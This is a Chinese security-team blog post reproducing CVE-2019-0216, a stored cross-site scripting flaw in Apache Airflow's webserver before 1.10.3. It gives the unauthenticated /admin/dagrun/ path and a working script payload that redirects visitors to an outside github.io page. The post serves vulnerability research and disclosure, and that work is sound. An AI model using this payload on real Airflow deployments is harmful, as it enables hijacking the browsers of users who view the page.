零组安全团队
点击蓝字
关注我们
标题:(CVE-2019-0216)Apache Airflow 储存型xss
出自:零组攻防实验室
文库是否收录:是
本文字数:327
阅读时常:8 min
01
漏洞简介
Apache Airflow 1.10.2及之前版本中的airflow webserver服务存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
02
漏洞影响
Apache Airflow < 1.10.3
03
复现过程
访问/admin/dagrun/(默认是不需要密码)
创建一个项目
返回列表,可以看到点击“运行”可以让你输入HTML代码
可以在里面输入代码
<script>_a="https://b4ny4n.github.io"</script><script>document.location=_a</script> 
可直接造成储存型xss
EDN
“以上文章已收录零组资料文库”
PS:想要获取一手零组官方最新资讯,关注公众号回复加群二字获取二维码扫码加群与各位表哥表姐和强大的福林表哥一起交流讨论研究吧~
分享、点赞和再看,能不能让我至少拥有一个呀?妖妖在这里祝各位表哥技术节节高升呀。
零组安全团队
扫二维码|关注我们
微信号|Zerosecurityxyao
微信公众号|零组攻防实验室
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论